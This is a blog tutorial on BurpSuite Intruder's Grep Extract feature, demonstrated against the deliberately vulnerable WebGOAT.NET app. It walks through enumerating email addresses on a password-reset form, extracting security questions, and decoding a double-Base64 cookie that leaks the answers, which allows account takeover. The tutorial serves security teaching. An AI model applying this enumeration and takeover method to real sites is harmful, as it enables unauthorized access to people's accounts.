13 Aug, 2014

Intro to BurpSuite V: Extracting Intrusions

by Ken Toler

Hi, Folks,

Since the last post on Intruder, I’ve been seeing questions come up on how to pull out data from a large number of results. I wanted to take some time to throw a quick post on how you can leverage some of the more advanced options in Intruder to automatically pull some information out. One of the suggestions that comes straight from PortSwigger is to use the Grep Extract option to pull data from responses.

Today, I’m going to demonstrate this functionality using WebGOAT.NET, a project that’s freely available on OWASP and Github so you can follow along.

Firstly, we’re picking up on the Intro to BurpSuite IV post on Intruder so have a refresher of that here.

The GOAT

Now to get started, we’re going to use the Forgot Password function over in the Customer section.

We see that to access this function we simply enter a valid email address into the form field and then it presents us with the Forgot Password question. 

So let’s assume for a moment that we have a large number of target email addresses. This isn’t all that outside the realm of possibility with large harvesting sites available like LinkedIn where user email addresses are often shared with the public. If this were a legitimate company pentest, you would easily be able to enumerate through a large number of addresses by guessing or looking up public profiles.

Let’s take a look at Intruder and see how we might be able to automate the enumeration of these questions so we can start guessing the answers.

Setup

We set up Intruder as normal by capturing the request and defining the payload position (as mentioned in the previous Intruder article). In this case, we are attacking the email parameter.

Now we head over to the Payloads tab and add our simple list of email addresses. In this case, and in the interest of clarity, I’ve included two (2) known good emails and two (2) known bad emails.

Next, we’re headed over to the Options tab to take advantage of Grep Extract. First, make sure you select the checkbox that says “Extract the following items from responses:”.

Then click the “Add” button.

Once you click “Add”, you’re presented with a screen that allows you to use Regex or a simplified version where you specify a beginning string and a delimiter. We know from what we saw in the response that the site says, “Here is the question we have on file for you:” and then provides a question. We can use this tool to pull out information immediately following this statement.

We use “file for you: “ (including the colon) to begin the analysis of the data, and we use the question mark as the ending delimiter because we know that every question the site generates will be presented with that symbol. Once we click “OK”, BurpSuite will process this in the results.

The Attack

So head up to the main Intruder file menu at the top of BurpSuite and start the attack.

Now we are presented with a Results window, and look! There are our questions.

Now you can start guessing the questions and get some passwords.

But Wait… There’s More!

But wait a second, if we double-click on results, we can examine individual responses. If you look closely, you may notice that the server is setting a cookie for each valid response and is NOT setting a cookie for each invalid response. I wonder if we can use this.

Let’s go ahead and repeat our process by adding this extraction alongside the question. Instead of using the question as the start and the question mark as the delimiter, we’re going to use “encr_sec_qu_ans=” as the start and “;” as the delimiter. This should extract the value of this cookie with each response.

With that added, let’s launch the attack again.

Nice, it looks like we may have gotten the answers, but they look pretty random. Let’s put one of these in Decoder to see if it’s encoded in some way. Usually in this case I would guess HTML or Base64, but since I don’t recognize any HTML encoding, let’s go with the latter.

Decoding our Results

Using Decoder is as simple as copying a value and selecting an appropriate encoding mechanism from the drop-down; in this case, we chose Base64. Now, decoding it seems to have given us another mangled value so at first glance we may be tempted to throw this away. However, it does seem like valid encoding since we notice that “==” at the end there. Let’s try again; maybe they’re double encoding the value.

Nice! It looks like they were. Now, if we had valid email addresses for this site, we could log in as anyone at this point. I hope this helped you understand a little bit more about Intruder. Until next time - send me a question or two about what you’d like to see next in the series. We’ll be getting into some more advanced topics soon.

For more information on using Burp’s Grep Extract functionality, check out John Poulin’s great post on using Recursive Grep to Test CSRF Protected Applications.

Ken is a Senior Security Consultant at nVisium. He works hard to defend our clients’ web applications and provide real solutions to their security concerns. Ken loves his technology and can always be found researching new languages, gadgets, applications, and hardware. Ken began his career in software product management, but quickly realized he’d rather be down in the weeds. Armed with the project management mindset, he dove head first into networking and development, and came out with a passion for security.

Ken is creative at heart and has an innate desire to provide an environment where clients are excited to learn about and implement good, proactive, and efficient security practices that compliment an organization rather than hold it back. Ken has worked in the IT industry for 7 years for companies such as HyperOffice, LivingSocial, Citrix and even the US ARMY which has enabled him to gain experience in all walks of business from a humble startup to a fully fledged enterprise, and he loves every waking second of what he does.